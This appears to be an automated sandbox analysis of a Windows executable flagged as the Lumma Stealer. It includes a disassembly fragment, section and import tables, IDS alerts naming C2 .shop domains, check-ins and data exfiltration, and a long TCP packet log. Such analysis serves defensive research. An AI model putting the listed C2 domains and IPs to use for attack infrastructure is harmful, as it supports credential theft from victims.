                                                                                                                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                          mov dword ptr [esp+14h], esi
                                                                                                                                                                                                          mov dword ptr [esp+18h], edi
                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                          mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                          cmp edx, 00000000h
                                                                                                                                                                                                          jne 00007FBA84D5BC89h
                                                                                                                                                                                                          mov eax, 00000000h
                                                                                                                                                                                                          jmp 00007FBA84D5BCE6h
                                                                                                                                                                                                          mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                          cmp edx, 00000000h
                                                                                                                                                                                                          jne 00007FBA84D5BC87h
                                                                                                                                                                                                          call 00007FBA84D5BD79h
                                                                                                                                                                                                          mov dword ptr [esp+20h], edx
                                                                                                                                                                                                          mov dword ptr [esp+24h], esp
                                                                                                                                                                                                          mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                          mov ebx, dword ptr [ebx]
                                                                                                                                                                                                          cmp edx, ebx
                                                                                                                                                                                                          je 00007FBA84D5BC9Ah
                                                                                                                                                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                          mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                          mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                          sub edi, 28h
                                                                                                                                                                                                          mov dword ptr [edi+24h], esp
                                                                                                                                                                                                          mov esp, edi
                                                                                                                                                                                                          mov ebx, dword ptr [ecx]
                                                                                                                                                                                                          mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                          mov dword ptr [esp], ebx
                                                                                                                                                                                                          mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                          mov dword ptr [esp+08h], edx
                                                                                                                                                                                                          call esi
                                                                                                                                                                                                          mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                          mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                          mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                          mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                          mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                          mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                          mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                          mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                          mov edx, dword ptr [ecx]
                                                                                                                                                                                                          mov eax, esp

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x69a0000x3dc.idata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x69b0000x265e4.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x5fc0200xa0.data
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x2e80550x2e8200eaa051c7530c144900b1170144dba1c3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rdata0x2ea0000x3103580x3104009756b06b91fcc19cb6669f145769ce4cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .data0x5fb0000x9e4280x6e0003fc245563ec7a62de584e9d1022a4fb1False0.5450284090909091data6.431380909213618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .idata0x69a0000x3dc0x400b10b5e434003ef71b7b239ab069ff485False0.4873046875data4.588210173857591IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .reloc0x69b0000x265e40x266006914548bf8d95cc5ffce43baed979d76False0.5621437296416938data6.630875445713944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .symtab0x6c20000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                          2025-01-07T06:01:53.190389+01002058616ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)1192.168.2.12539871.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.201766+01002058598ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)1192.168.2.12611641.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.213434+01002058632ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)1192.168.2.12603821.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.224916+01002058610ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)1192.168.2.12594911.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.235108+01002058628ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)1192.168.2.12608431.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.245728+01002058618ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)1192.168.2.12523441.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.257267+01002058622ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)1192.168.2.12503811.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.268439+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.12553051.1.1.153UDP
                                                                                                                                                                                                          2025-01-07T06:01:53.949040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249714104.102.49.254443TCP
                                                                                                                                                                                                          2025-01-07T06:01:54.486321+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1249714104.102.49.254443TCP
                                                                                                                                                                                                          2025-01-07T06:01:55.095658+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249715104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:55.679027+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1249715104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:55.679027+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249715104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:56.178686+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249716104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:56.656307+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1249716104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:56.656307+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249716104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:57.515055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249717104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:01:58.799997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249718104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:00.041788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249719104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:02.028689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249720104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:03.345579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249721104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:04.152149+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1249721104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:04.676158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249722104.21.112.1443TCP
                                                                                                                                                                                                          2025-01-07T06:02:05.172574+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249722104.21.112.1443TCP

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.291867018 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.291925907 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.292013884 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.295408010 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.295442104 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.948965073 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.949039936 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.953980923 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.953994989 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.954276085 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.995117903 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.006622076 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.047343969 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486373901 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486409903 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486438036 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486454964 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486463070 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486481905 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486491919 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486500978 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486500978 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.486573935 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.585752010 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.585779905 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.585870028 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.585895061 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.585935116 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589031935 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589097977 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589104891 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589134932 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589142084 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.589176893 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.590756893 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.590775013 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.590792894 CET49714443192.168.2.12104.102.49.254
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.590797901 CET44349714104.102.49.254192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.628607988 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.628647089 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.628730059 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.629106045 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.629121065 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.095558882 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.095658064 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.262940884 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.262968063 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.263346910 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.264794111 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.264810085 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.264878988 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679042101 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679150105 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679218054 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679440975 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679450989 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679480076 CET49715443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.679486036 CET44349715104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.712291956 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.712332964 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.712407112 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.712692022 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:55.712706089 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.178581953 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.178685904 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.180049896 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.180064917 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.180309057 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181669950 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181699991 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181730986 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656326056 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656404972 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656435966 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656483889 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656510115 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656518936 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656529903 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656567097 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656584024 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657234907 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657330036 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657382965 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657391071 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661396980 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661427975 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661477089 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661483049 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661535025 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744726896 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744869947 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744998932 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745512009 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745528936 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745541096 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745547056 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036607981 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036636114 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036696911 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.037017107 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.037028074 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.514966011 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.515054941 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516274929 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516283035 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516532898 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519531965 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519649982 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519680977 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091483116 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091594934 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091645002 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.092164993 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.092181921 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336358070 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336409092 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336498976 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336911917 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336927891 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.799793959 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.799997091 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801248074 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801258087 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801500082 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802834034 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802896023 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802923918 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802923918 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802944899 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802982092 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.803004026 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.287743092 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.287846088 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.291896105 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.292052984 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.292069912 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580478907 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580562115 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580645084 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580956936 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580979109 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.041671991 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.041788101 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043169975 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043180943 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043440104 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044734955 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044873953 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044919014 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044986963 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044998884 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545706034 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545816898 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545872927 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.546125889 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.546142101 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555162907 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555202007 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555260897 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555571079 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555587053 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.028580904 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.028688908 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030031919 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030044079 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030291080 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031610012 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031717062 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031727076 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764039040 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764134884 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764214993 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764375925 CET49720443192.168.2.12104.21.112.1
